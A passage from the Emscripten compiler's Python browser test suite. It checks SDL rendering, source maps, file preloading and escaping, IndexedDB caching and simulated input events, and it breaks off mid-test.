super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log', 'emscripten_log.cpp'),
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g4'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
self.compile_btest(['main.cpp', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_multifile(self):
# a few files inside a directory
ensure_dir(os.path.join('subdirr', 'moar'))
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
create_file(os.path.join('subdirr', 'moar', 'data2.txt'), '3.14159265358979')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
FILE *f2 = fopen("subdirr/moar/data2.txt", "r");
fread(buf, 1, 16, f2);
buf[16] = 0;
fclose(f2);
printf("|%s|\n", buf);
result = result && !strcmp("3.14159265358979", buf);
REPORT_RESULT(result);
return 0;
}
''')
# by individual files
self.compile_btest(['main.cpp', '--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt', '-o', 'page.html'])
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
os.remove('page.html')
# by directory, and remove files to make sure
self.compile_btest(['main.cpp', '--preload-file', 'subdirr', '-o', 'page.html'])
shutil.rmtree('subdirr')
self.run_browser('page.html', 'You should see two cool numbers', '/report_result?1')
def test_custom_file_package_url(self):
# a few files inside a directory
ensure_dir('subdirr')
ensure_dir('cdn')
create_file(os.path.join('subdirr', 'data1.txt'), '1214141516171819')
# change the file package base dir to look in a "cdn". note that normally
# you would add this in your own custom html file etc., and not by
# modifying the existing shell in this manner
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
char buf[17];
FILE *f = fopen("subdirr/data1.txt", "r");
fread(buf, 1, 16, f);
buf[16] = 0;
fclose(f);
printf("|%s|\n", buf);
int result = !strcmp("1214141516171819", buf);
REPORT_RESULT(result);
return 0;
}
''')
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'])
shutil.move('test.data', os.path.join('cdn', 'test.data'))
self.run_browser('test.html', '', '/report_result?1')
def test_missing_data_throws_error(self):
def setup(assetLocalization):
self.clear()
create_file('data.txt', 'data')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
// This code should never be executed in terms of missing required dependency file.
REPORT_RESULT(0);
return 0;
}
''')
create_file('on_window_error_shell.html', r'''
<html>
<center><canvas id='canvas' width='256' height='256'></canvas></center>
<hr><div id='output'></div><hr>
<script type='text/javascript'>
window.onerror = function(error) {
window.onerror = null;
var result = error.indexOf("test.data") >= 0 ? 1 : 0;
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8888/report_result?' + result, true);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}
var Module = {
locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}},
print: (function() {
var element = document.getElementById('output');
return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';};
})(),
canvas: document.getElementById('canvas')
};
</script>
{{{ SCRIPT }}}
</body>
</html>''')
def test():
# test test missing file should run xhr.onload with status different than 200, 304 or 206
setup("")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
shutil.move('test.data', 'missing.data')
self.run_browser('test.html', '', '/report_result?1')
# test unknown protocol should go through xhr.onerror
setup("unknown_protocol://")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
# test wrong protocol and port
setup("https://localhost:8800/")
self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html'])
self.run_browser('test.html', '', '/report_result?1')
test()
# TODO: CORS, test using a full url for locateFile
# create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, '))
# test()
def test_dev_random(self):
self.btest(os.path.join('filesystem', 'dev_random.cpp'), expected='0')
def test_sdl_swsurface(self):
self.btest('sdl_swsurface.c', args=['-lSDL', '-lGL'], expected='1')
def test_sdl_surface_lock_opts(self):
# Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface.
self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])
def test_sdl_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
src = test_file('sdl_image.c')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
src, '-o', 'page.html', '-O2', '-lSDL', '-lGL', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
src = test_file('sdl_image.c')
self.compile_btest([
src, '-o', 'page.html', '-lSDL', '-lGL',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
def test_sdl_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)
def test_sdl_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_image_must_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)
def test_sdl_stb_image(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_bpp(self):
# load grayscale image without alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load grayscale image with alpha
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGB image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
# load RGBA image
self.clear()
shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O0', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-O2', '-s', 'SAFE_HEAP', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(test_file(self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-worker; emits 2 js files, client and worker
self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-s', 'ASYNCIFY']
]:
print(delay, defines, async_)
create_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main]', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=[_main]'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
